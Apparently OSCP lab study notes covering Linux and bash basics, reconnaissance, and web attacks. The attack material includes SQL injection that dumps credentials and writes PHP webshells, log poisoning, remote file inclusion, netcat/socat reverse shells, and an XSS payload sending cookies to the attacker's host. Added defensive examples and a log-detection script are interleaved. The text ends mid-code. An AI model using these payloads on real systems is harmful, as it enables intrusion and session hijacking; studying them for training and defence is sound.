Study Notes - 2021/03/16

Use phpMyAdmin to execute arbitrary SQL

select * from webappdb.users;
insert into webappdb.users(password, username) VALUES ("backdoor","backdoor");

Cross-Site Scripting (XSS)

Once we identify an entry point, we can input special characters, and observe the output to see if any of the special characters return unfiltered.

Content Injection

Inject an invisible iframe: <iframe src=http://192.168.119.148/report height="0" width="0"></iframe>
Open a listener on the attack machine: sudo nc -nvlp 80
The iframe can also redirect to an information gathering script.

Steal cookie and session information

Directory Traversal Vulnerabilities

Identify

Find any parameter in the URL that looks like a file name,
e.g. http://192.168.148.10/menu.php?file=current_menu.php
Modify the file parameter to reference files that should be readable by any user on the system, such as
/etc/passwd on Linux, or c:\boot.ini and c:\windows\system32\drivers\etc\hosts on Windows

File inclusion Vulnerabilities

The included file will be executed.

local file inclusion/remote file inclusion

The difference is where the included file comes from.
We must locate parameters we can manipulate and attempt to use them to load arbitrary files. However, a file inclusion takes this one step further, as we attempt to execute the contents of the file within the application.

Contaminating Log Files

Clear the log.
Connect to the server and send <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
This output is first wrapped in pre HTML tags, which preserve any line breaks or formatting in the results of the function call.
The line is inserted into the Apache access log:
192.168.119.148 - - [16/Mar/2021:18:18:11 -0700] "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 980 "-" "-"

Access the file inclusion URL: http://192.168.148.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Remote file inclusion

Remote file inclusion (RFI) vulnerabilities are less common than LFIs since the server must be configured in a very specific way, but they are usually easier to exploit. For example, PHP apps must be configured with allow_url_include set to “On”.

http://192.168.148.10/menu.php?file=http://192.168.119.148/evil.txt&cmd=ipconfig
Host the file by setting up an Apache server:

sudo vi /var/www/html/evil.txt
sudo systemctl start apache2

or

sudo python -m SimpleHTTPServer 80

webshell

/usr/share/webshells

Expanding Your Repertoire

Open an HTTP server on the current working path:

python -m SimpleHTTPServer 2334
python3 -m http.server 7331
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000

PHP Wrappers

When you cannot poison local files:
menu.php?file=data:text/plain,hello world
PHP treats the data wrapper as a file:
menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

SQL injection

Discover SQL Injection Vulnerabilities

A common statement in SQL:
$query = "select * from users where username = '$user' and password = '$pass'";

Authentication Bypass

tom' or 1=1;#    (# is a comment in MySQL and MariaDB)
Some web applications expect the number of returned rows to be 1; add LIMIT 1: tom' or 1=1 LIMIT 1;#

Enumerating the database

http://192.168.148.10/debug.php?id='

Column number enumeration

http://192.168.148.10/debug.php?id=1 order by 1
Use the Burp Suite Repeater tool
The results contain 3 columns

Extract further data with a UNION statement

Decide which column is displayed:
192.168.148.10/debug.php?id=1 union all select 1,2,3

UNION ALL allows duplicate values

Columns 2 and 3 get displayed.
Extract the database version (depends on the database engine; MariaDB uses @@version):
http://192.168.148.10/debug.php?id=1 union all select 1, 2, @@version -> 10.1.31-MariaDB
Extract the current database user:
http://192.168.148.10/debug.php?id=1 union all select 1, 2, user() -> root@localhost

We can enumerate database tables and column structures through the information_schema.
The information schema stores information about the database, like table and column names.
We can use it to get the layout of the database so that we can craft better payloads to extract
sensitive data. The query for this would look similar to the following:
http://192.168.148.10/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

Retrieve the column names of the users table:
http://192.168.148.10/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

Extract usernames and passwords:
http://192.168.148.10/debug.php?id=1 union all select 1, username, password from users

From sql injection to code execution

http://192.168.148.10/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

INTO OUTFILE:
From the error message we know the location of the web server root: c:\xampp\htdocs

http://192.168.148.10/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor2.php'

http://192.168.148.10/debug.php?id=1 union all select 1, 2, "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" into OUTFILE 'c:/xampp/htdocs/backdoor4.php'
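An added example, not from these notes or the lab application, that reproduces the two injection shapes above (the concatenated login query and the numeric id in debug.php) in Python with an in-memory SQLite database, next to the parameterised versions that stop them. The schema and credentials are constructed; SQLite uses `--` rather than MySQL's `#` for the trailing comment.

```python
import sqlite3


def build_db():
    """Constructed demo schema (not the lab's database): a users table and a 3-column posts table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table users(id integer primary key, username text, password text);
        insert into users(username, password) values ('tom', 'S3cret!'), ('admin', 'hunter2');
        create table posts(id integer primary key, title text, body text);
        insert into posts(title, body) values ('Menu', 'Soup of the day');
    """)
    return conn


def login_vulnerable(conn, user, pw):
    # Same shape as the PHP query in the notes: user input is spliced into the SQL text.
    query = f"select * from users where username = '{user}' and password = '{pw}'"
    return conn.execute(query).fetchall()


def login_safe(conn, user, pw):
    # Placeholders: the driver sends the values separately, so quotes and comments stay data.
    query = "select * from users where username = ? and password = ?"
    return conn.execute(query, (user, pw)).fetchall()


def post_vulnerable(conn, post_id):
    # Numeric parameter spliced in without quotes, like debug.php?id=1 in the notes.
    query = f"select id, title, body from posts where id = {post_id}"
    return conn.execute(query).fetchall()


def post_safe(conn, post_id):
    # Validate the type first, then bind: "1 union all select ..." never reaches the SQL engine.
    try:
        post_id = int(post_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("select id, title, body from posts where id = ?", (post_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    bypass = "tom' or 1=1 limit 1 --"
    print("vulnerable login:", login_vulnerable(db, bypass, "wrong"))  # one row: logged in as tom
    print("safe login:", login_safe(db, bypass, "wrong"))              # []
    leak = "1 union all select 1, username, password from users"
    print("vulnerable post:", post_vulnerable(db, leak))                # the post plus every credential
    print("safe post:", post_safe(db, leak))                            # []
```

The `load_file`/`INTO OUTFILE` step in the notes additionally needs the MySQL FILE privilege on the web application's database account and an unrestricted `secure_file_priv`; a least-privilege account without FILE turns that step into a permission error.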

Automating sql injection

sqlmap (not allowed in the exam)
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id"
-p: the parameter to test

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6836=6836

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 4323 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(4323=4323,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1257 FROM (SELECT(SLEEP(5)))yDOk)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x5a65795043747065446255675763434c564c48537750534f6d437859715570677765524e4552616a,0x716b627a71),NULL-- -

Automate the data extraction:
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id" --dbms=mysql --dump

MySQL and MariaDB look similar

Get an OS shell automatically:
sqlmap -u http://192.168.148.10/debug.php?id=1 -p "id" --dbms=mysql --os-shell
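Every web technique in these notes (log poisoning, traversal, LFI of access.log, RFI, the data: wrapper, UNION and blind SQL injection, sqlmap) leaves a recognisable trace in the Apache access log. The following is an added detection example, not code from the notes: a small triage script over constructed combined-format log lines that replay those requests; the rule names, the `sqlmap` User-Agent string and the log lines are all assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines replaying the requests described in the notes.
SAMPLE_LOG = r"""192.168.119.148 - - [16/Mar/2021:18:18:11 -0700] "GET /menu.php?file=current_menu.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:18:11 -0700] "<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 980 "-" "-"
192.168.119.148 - - [16/Mar/2021:18:19:02 -0700] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:20:40 -0700] "GET /menu.php?file=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:21:13 -0700] "GET /menu.php?file=http://192.168.119.148/evil.txt&cmd=ipconfig HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:22:05 -0700] "GET /menu.php?file=data:text/plain,%3C%3Fphp%20echo%20shell_exec(%22dir%22)%20%3F%3E HTTP/1.1" 200 455 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:23:30 -0700] "GET /debug.php?id=1%20union%20all%20select%201,%202,%20@@version HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.168.119.148 - - [16/Mar/2021:18:24:00 -0700] "GET /debug.php?id=1%20AND%20(SELECT%201257%20FROM%20(SELECT(SLEEP(5)))yDOk) HTTP/1.1" 200 640 "-" "sqlmap/1.5#stable (http://sqlmap.org)"
10.11.0.5 - - [16/Mar/2021:18:25:00 -0700] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
METHODS = {"GET", "POST", "HEAD", "OPTIONS", "PUT", "DELETE"}
SQLMAP_UA = re.compile(r"sqlmap", re.I)

# Rules run against the percent-decoded request line. Names are our own labels.
RULES = [
    ("php-code-in-request", re.compile(r"<\?php", re.I)),                  # log poisoning / data: wrapper
    ("path-traversal",      re.compile(r"\.\.[/\\]")),
    ("null-byte",           re.compile(r"\x00")),                          # %00 after decoding
    ("local-log-include",   re.compile(r"[?&]file=[^&]*(access|error)\.log", re.I)),
    ("remote-file-include", re.compile(r"[?&]file=(https?|ftp)://", re.I)),
    ("php-wrapper",         re.compile(r"[?&]file=(data:|php://|expect://)", re.I)),
    ("sql-union",           re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("sql-blind",           re.compile(r"\b(sleep|benchmark)\s*\(|\border\s+by\s+\d+", re.I)),
    ("sql-fingerprint",     re.compile(r"@@version|information_schema|\buser\(\)|load_file\(|into\s+outfile", re.I)),
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(entry):
    """Return the names of every rule the decoded request line or User-Agent trips."""
    decoded = unquote(entry["request"])
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if SQLMAP_UA.search(entry["ua"]):
        hits.append("sqlmap-user-agent")
    if entry["request"].split(" ", 1)[0] not in METHODS:
        hits.append("malformed-request-line")  # raw PHP sent instead of a request line
    return hits


def triage(log_text):
    """(ip, timestamp, hits) for every line that trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["time"], hits))
    return findings


if __name__ == "__main__":
    for ip, when, hits in triage(SAMPLE_LOG):
        print(f"{ip} [{when}] {', '.join(hits)}")
```

The script decodes before matching because the wrapper and SQL payloads arrive percent-encoded; the poisoning line itself is caught twice, by its PHP tag and by the 400 response to a request line that starts with no HTTP method.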


Study Notes - 2021/03/15

NFS Enumeration

port 111
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap NFS NSE scripts:

nmap -p 111 --script nfs* 10.11.1.72

PORT    STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /home 10.11.0.0/255.255.0.0

Mount it on our machine:

mkdir home_72
sudo mount -o nolock 10.11.1.72:/home home_72

-o nolock disables file locking, needed for old NFS servers

drwxr-xr-x 2 nobody 4294967294 4096 Oct 27  2019 .
drwxr-xr-x 7 root root 4096 Sep 17 2015 ..
-rwx------ 1 nobody 4294967294 48 Oct 27 2019 creds.txt

Shows nobody instead of a user id; cannot create a user id as the guide shows
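The showmount output above is a /home export offered to a whole /16. As an added example (not from the notes), this audits an NFS server's /etc/exports for the settings that make such an export dangerous: world exports, `no_root_squash`, `insecure`, read-write exports to wide networks, and the classic exports(5) mistake of a space before the option list, which silently exports to everyone. The exports file content is constructed.

```python
import ipaddress
import re

# Constructed /etc/exports (not from the lab file server).
SAMPLE_EXPORTS = """\
# exports for the lab file server
/home        10.11.0.0/255.255.0.0(rw,sync,no_root_squash)
/srv/share   *(ro,sync)
/srv/backup  10.11.1.0/24(rw,sync) 10.11.2.5(rw,sync,insecure)
/srv/oops    10.11.1.0/24 (rw,sync)
"""

# One client token: "host", "host(opts)" or "(opts)"; the last form means every host.
ENTRY_RE = re.compile(r"^(?P<host>[^\s(]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text):
    """Return [(path, [(host, [opt, ...]), ...]), ...] for each export line."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        entries = []
        for client in clients:
            m = ENTRY_RE.match(client)
            if m is None:
                continue
            host = m.group("host") or "*"  # "(rw)" with no host applies to every client
            opts = [o for o in (m.group("opts") or "").split(",") if o]
            entries.append((host, opts))
        exports.append((path, entries))
    return exports


def prefix_len(host):
    """Prefix length of a host or network spec; None for wildcards and hostnames."""
    try:
        return ipaddress.ip_network(host, strict=False).prefixlen  # accepts /16 and /255.255.0.0
    except ValueError:
        return None


def audit_exports(text):
    """Findings as plain strings, one per risky (path, client) combination."""
    findings = []
    for path, entries in parse_exports(text):
        for host, opts in entries:
            if host == "*":
                findings.append(f"{path}: exported to every host ({','.join(opts) or 'defaults'})")
            if "no_root_squash" in opts:
                findings.append(f"{path}: no_root_squash for {host}: a remote root is root on the export")
            if "insecure" in opts:
                findings.append(f"{path}: insecure for {host}: mounts allowed from unprivileged source ports")
            plen = prefix_len(host)
            if plen is not None and plen < 24 and "rw" in opts:
                findings.append(f"{path}: read-write export to the /{plen} network {host}")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```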

SMTP enumeration

find existing users
port 25, udp

nc -nv 10.11.1.217 25
VRFY idontexist

SNMP Enumeration

SNMP MIB Tree

Scan for SNMP

sudo nmap -sU --open -p 161 10.11.1.1-254 -oG open-snmp.txt
--open only displays open ports
onesixtyone -c community -i ips
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.119.133

example

enumerating the entire MIB tree:
snmpwalk -c public -v1 -t 10 10.11.1.14
-v SNMP version number
-t increases the timeout to 10s

enumerating windows users

enumerating windows processes

open tcp ports

software

Vulnerability Scanning

Scan with Nessus
Open in browser: https://localhost:8834/

Vulnerability scan with nmap

cd /usr/share/nmap/scripts/
head script.db
# can grep this file
sudo nmap --script vuln 10.11.1.10

Attack web application

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Web application Enumeration

  • Programming language and frameworks
  • Web server software
  • Database software
  • server OS

Inspecting URLs

File extensions hint at the language: .php for PHP.
For example, a Java-based web application might use .jsp, .do, or .html.
Concept of routes: map a URI to a section of code.

Inspecting Page Content

Open the Debugger; it can pretty-print the code content.

Right click -> Inspect Element

View Response headers:

  • proxy
  • firefox network tool

The Server header sometimes reveals the server application and version number.
Headers starting with X- are non-standard HTTP headers and can reveal additional info.

Inspecting sitemaps

Most common sitemap files:
robots.txt
sitemap.xml

Locating administration consoles

Two common examples are the manager application for Tomcat and phpMyAdmin for MySQL hosted at /manager/html and /phpmyadmin respectively.

Web application assessment tools

DIRB

Web content scanner using a wordlist.
dirb http://www.megacorpone.com -r -z 10
-r to scan non-recursively, and -z 10 to add a 10 millisecond delay to each request

Burp suite

FoxyProxy Firefox add-on
Add the CA certificate for Burp Suite:
Proxy -> Options -> Regenerate CA certificate
Go to the browser, enable the proxy, open http://burp -> CA certificate to download the .crt file, then import the certificate
Send to Repeater to send a single request

Nikto

Web server scanner; not intended to be stealthy, it sends info in the User-Agent to identify itself
-maxtime
-T which types of tests

nikto -host=megacorpone.com -maxtime=30s

Exploiting

Exploiting admin consoles

Windows client -> XAMPP, start Apache and MySQL

dirb http://10.11.0.22 -r
==> DIRECTORY: http://10.11.0.22/phpmyadmin/

Burp intruder

<input type="hidden" name="set_session" value="7r8oiuuoofdtcgc7ao731o0tcc" />
<input type="hidden" name="token" value="K&amp;$&amp;FR1\.cQ4)QW(" />

Send to Intruder
Select the positions; attack type: Pitchfork, allowing us to set a unique payload list for each position.


Study Notes - 2021/03/14

Practical Tools

Netcat

nc -nvlp 4444 -e /usr/bin/bash
nc -nv 192.168.xxx.xx 4444 -e /usr/bin/bash

Transfer a file:
nc -nvlp 4444 > incoming.txt
nc -nv xxx.xxx.xxx.xxx 4444 < sendfile.txt

socat

socat - TCP4:10.11.0.22:110
sudo socat TCP4-LISTEN:443 STDOUT
sudo socat TCP4-LISTEN:443,fork file:secret.txt
socat TCP4:localhost:443 file:receive.txt,create

reverse shell

sudo socat -d -d TCP4-LISTEN:443 STDOUT
socat TCP4:localhost:443 EXEC:/bin/bash
-d -d increases the verbosity level twice

encrypted bind shells

Create a certificate:
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat - OPENSSL:localhost:443,verify=0

Powershell

Set-ExecutionPolicy Unrestricted

file transfer


Let me skip this

Wireshark

Capture filter:
net 10.11.1.0/24
Display filter:
tcp.port == 21
Right-click a packet -> Follow TCP Stream

TCPDUMP

sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $5}' | sort | uniq -c | head

Bash Scripting

variable

var1=hello
echo $var1

var1='hello world'
var1="hello world"

Single quotes: every enclosed character is interpreted literally.
Double quotes: the same, except for $, `, and \.

user=$(whoami)
user2=`whoami`

Both forms execute the command in a subshell.
$1, $2 ... are the positional arguments
$? is the exit status of the most recently run process

Reading user input

read answer assigns the input to the answer variable
-p specifies the prompt
-sp secret (silent) prompt, input is not echoed

Conditions

if [ <sometest> ]
then
<statements>
elif [ <condition> ]
then
<statement>
else
<statements>
fi
Operator / Description (the expression is true if ...)
!EXPRESSION The EXPRESSION is false.
-n STRING STRING length is greater than zero
-z STRING The length of STRING is zero (empty)
STRING1 != STRING2 STRING1 is not equal to STRING2
STRING1 = STRING2 STRING1 is equal to STRING2
INTEGER1 -eq INTEGER2 INTEGER1 is equal to INTEGER2
INTEGER1 -ne INTEGER2 INTEGER1 is not equal to INTEGER2
INTEGER1 -gt INTEGER2 INTEGER1 is greater than INTEGER2
INTEGER1 -lt INTEGER2 INTEGER1 is less than INTEGER2
INTEGER1 -ge INTEGER2 INTEGER1 is greater than or equal to INTEGER 2
INTEGER1 -le INTEGER2 INTEGER1 is less than or equal to INTEGER 2
-d FILE FILE exists and is a directory
-e FILE FILE exists
-r FILE FILE exists and has read permission
-s FILE FILE exists and it is not empty
-w FILE FILE exists and has write permission
-x FILE FILE exists and has execute permission

cmd && cmd2: execute cmd2 only if cmd returns true/success
cmd || cmd2: execute cmd2 only if cmd fails

if [ <cond1> ] && [ <cond2> ]
then
<statement>
fi

Loops:

For loop

for var-name in <list>
do
<action>
done

for ip in $(seq 1 10); do echo 10.11.1.$ip; done
for i in {1..10}; do echo 10.11.1.$i;done

While loops

while [ <some test> ]
do
<perform an action>
done

functions

function function_name {
echo "$1"
}

function_name () {
commands...
}

function_name $RANDOM

A function must be defined before it is called.

Return:

function1() {
return $RANDOM
}
function1
echo "value returned is $?"

local variable

name1=hello
name2=name2
func1() {
local name1=world
name2=changed
}

Some practical usage

grep "href=" index.html | grep "\.google" | grep -v "www\.google\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
grep -o '[^/]*\.google\.com' index.html | sort -u > list.txt
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

[^/]* matches any character except '/'

Second usage:

searchsploit afd windows -w -t
searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"

-w Show URLs to Exploit-DB.com rather than the local path

for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|");
do exp_name=$(echo $e | cut -d "/" -f 5) && url=$(echo $e | sed 's/exploits/raw/') &&
wget -q --no-check-certificate $url -O $exp_name; done

-q quiet mode

#!/bin/bash
# Bash script to search for a given exploit and download all matches.
for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|")
do
exp_name=$(echo $e | cut -d "/" -f 5)
url=$(echo $e | sed 's/exploits/raw/')
wget -q --no-check-certificate $url -O $exp_name
done

Third usage:

sudo nmap -A -p80 --open 10.11.1.0/24 -oG nmap-scan_10.11.1.1-254

cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'

awk uses space as the default delimiter

for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done

cutycapt renders the webpage to an image

Passive Information Gathering

Passive Information Gathering (also known as Open-source Intelligence or OSINT)

  • never communicate with the target directly

Website Recon

Simply browse the site

Whois enumeration

whois google.com; can also look for the name servers (ns)
Reverse lookup:
whois <ip>

Google Hacking

site:domainname.com filetype:php
site:domainname.com -filetype:html
intitle:"index of" "parent directory"
https://www.exploit-db.com/google-hacking-database

netcraft

https://www.netcraft.com/
https://searchdns.netcraft.com

Recon-NG

Shodan

Security headers

https://securityheaders.com/

SSL server test

https://www.ssllabs.com/ssltest/
Analyzes SSL/TLS configurations

https://pastebin.com/

User information gathering

Email Harvesting

theHarvester -d hello.com -b google

https://www.social-searcher.com
https://digi.ninja/projects/twofi.php
https://github.com/initstring/linkedin2username

StackOverflow?

Some frameworks

OSINT Framework https://osintframework.com/
Maltego https://www.paterva.com/buy/maltego-clients.php

Active Information Gathering

DNS Enumeration

host www.google.ca
host -t mx www.google.ca

Forward Lookup bruteforce

Reverse lookup bruteforce

for ip in $(seq 50 100); do host x.x.x.$ip; done | grep -v "not found"

DNS ZONETRANSFER

host -l
dnsrecon -d domain -D ~/list -t brt

Port Scanning

nc -nvv -w 1 -z 10.11.1.220 3388-3390
-w specifies the connection timeout in seconds and -z zero-I/O mode (no data sent)
nc -nv -u -z -w 1 10.11.1.115 160-162
-u UDP

Nmap

-sT TCP connect scan
-sU udp scan
-sS stealth/SYN scan

network sweeping

nmap -sn 10.11.1.1-254 (-sn: ping scan, disables the port scan)
nmap -p 80 10.11.1.1-254 -oG web-sweep.txt
nmap -sT -A --top-ports=20 10.11.1.1-254 -oG top-port-sweep.txt

top ports determined here: /usr/share/nmap/nmap-services

-O OS fingerprint scan
-sV determine service and version info

Nmap scripting engine (NSE)

masscan

sudo apt install masscan

SMB Enumeration

port 139, 445
nmap -v -p 139,445 --script=smb-os-discovery 10.11.1.227
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
sudo nbtscan -r 10.11.1.0/24

NFS Enumeration

rpc-bind 107


Study Notes - 2021/03/13

Some reviews:

Kali Linux

/bin/ user binaries
/sbin/ system programs
/etc/ configuration files
/tmp/ temporary files, deleted on boot
/usr/bin/ user binaries
/usr/share application support files

Linux Commands:

man -k passwd:  key word search
└─$ man -k '^passwd$'
passwd (1) - change user password
passwd (1ssl) - compute password hashes
passwd (5) - the password file
man 5 passwd

apropos == man -k

ls -a1
-1 means one file per line
cd, mkdir, pwd
Paths with spaces:
cd module\ one/
mkdir -p /hello/world/{recon,exploit,report}

Finding files in kali linux

find, locate, which

locate searches a built-in database instead of the hard disk; the database can be updated manually: sudo updatedb

find can search by size, type, ...

sudo find / -name sbd*

manage linux services

sudo systemctl start ssh
sudo ss -antlp | grep sshd
ss is used to dump socket statistics.

-a all
-n numerical
-t tcp
-l listening
-p display process

list all available services:

systemctl list-unit-files

Search/install/remove tools

sudo apt update
sudo apt upgrade <package-name>

apt-cache search pure-ftpd: check whether a package exists; searches package descriptions
apt show <package-name>: show the description
apt install <package-name>
apt remove --purge: completely remove the package including user configurations

sudo dpkg -i <path to the package file.deb>: will not install any dependencies

Commandline

Some environment variables:

$PATH, $USER, $PWD, $HOME

Define an environment variable:

export b=10.11.1.220
ping -c 2 $b

Without export, the variable only affects the current bash and is not inherited by spawned shells

env

Bash history

history
!32 # replay line 32
!! # repeat the last command

saved in ~/.bash_history
$HISTSIZE, $HISTFILESIZE
CTRL+R reverse-i-search looking for most recent matched command

Pipeline and redirection

0 STDIN, 1 STDOUT, 2 STDERR

Redirect to a new file:
echo "test" > test.txt
Redirect to an existing file:
echo "test" >> test.txt
Redirect from a file:
wc -m < test.txt connects the file to the STDIN of wc
Redirect STDERR
ls ./test 2>error.txt

Piping

cat error.txt | wc -m output of cat to input of wc

Text searching

ls -la /usr/bin | grep zip
-r recursive search
-i ignore case
sed:
echo "I need to try hard" | sed 's/hard/harder/'
cut:
echo "hello, world, ???" | cut -f 2 -d ","
-f field
-d delimiter
can only accept a single-character delimiter
echo "hello::there::friend" | awk -F "::" '{print $1, $3}'
-F field separator

cat access.log | cut -d " " -f 1 | sort -u
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn

-n compare according to string numerical value
-r reverse the result of comparisons

Nano

Ctrl + K cut the line
Ctrl + U paste the line
Ctrl + W search in the file

Vim

dd delete current line
yy copy the current line
p to paste the clipboard content
x delete the char under the current cursor

File comparison

comm file1 file2: lines unique to file1, lines unique to file2, and lines in both
comm -12 file1 file2: suppress columns 1 and 2, only display lines in both files
diff -c/-u
vimdiff: Ctrl + W + arrow switches window
[c / ]c jump to the previous/next change
do get the change from the other window and put it in the current one
dp put the change from the current window into the other one

Manage processes

background process

Ctrl + Z to suspend it, then resume it using bg

jobs shows the jobs in the current terminal
fg %[jobnum] return the job to the foreground

ps -ef
-e, --everyone show processes of all users
-f, --full show process uids, ppids

File and Command Monitoring

tail and watch
watch runs a command every 2 seconds

watch -n 5 w

w - Show who is logged on and what they are doing.
-n every 5 seconds

Download Files:

wget -O [dest] [url]
curl -o [dest] [url]
axel -a -n 50 -o [dest] [url]
-n number of connections use
-a Alternate progress indicator

Bash environment

export HISTCONTROL=ignoredups

System bash /etc/bash.bashrc


OSCP Study Notes - 2021/03/12

Vulnhub Box: XSS & MySQL FILE

Cross-Site Scripting

Find the IP address using netdiscover: 192.168.119.134

Test by adding to the comment box:

<script>alert("helloxss")</script>

Create a PHP script:

<?php
$cookie = isset($_GET["test"]) ?$_GET["test"]:"";
?>

Start a PHP server:

service apache2 stop
php -S 192.168.119.132:80
# -S <addr>:<port> Run with built-in web server.

Inject JavaScript into the comment box:

<script>location.href='http://192.168.119.132/index.php?test='+document.cookie;</script>

Then get a bunch of cookies:

[Fri Mar 12 14:06:59 2021] 192.168.119.134:37106 [200]: GET /index.php?test=PHPSESSID=h576adtob2huvem6m28ndk6lm5
[Fri Mar 12 14:06:59 2021] 192.168.119.134:37106 Closing
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 Accepted
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 [200]: GET /index.php?test=PHPSESSID=k0u7iarj89i203m84udm5ve7r5
[Fri Mar 12 14:08:00 2021] 192.168.119.134:37110 Closing
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 Accepted
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 [200]: GET /index.php?test=PHPSESSID=ioephhq6n3efntimq0nb2hfv26
[Fri Mar 12 14:08:59 2021] 192.168.119.134:37114 Closing
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 Accepted
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 [200]: GET /index.php?test=PHPSESSID=56lch59vt5c10o40lutelou564
[Fri Mar 12 14:09:59 2021] 192.168.119.134:37118 Closing
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 Accepted
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 [200]: GET /index.php?test=PHPSESSID=tal24ib05acs49vaf2i39r6jh7
[Fri Mar 12 14:10:59 2021] 192.168.119.134:37122 Closing
[Fri Mar 12 14:11:59 2021] 192.168.119.134:37126 Accepted

Download the Cookie Manager Plus plugin
Add the cookie, refresh and click the admin link

Login as admin !!
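The cookie theft above works because the comment is rendered unescaped and the session cookie is readable from document.cookie; the response-header notes earlier in this file and the Nikto findings further down list the headers that the lab box lacks. As an added example (not code from the notes or the lab application), this audits a response's headers and Set-Cookie attributes and shows output encoding of the comment; the header values are constructed.

```python
import html
import re

# Constructed response headers modelled on the lab box (not captured from it).
WEAK_RESPONSE = {
    "Server": "Apache/2.2.16 (Debian)",
    "X-Powered-By": "PHP/5.3.2",
    "Content-Type": "text/html",
    "Set-Cookie": "PHPSESSID=constructedsessionid0001; path=/",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
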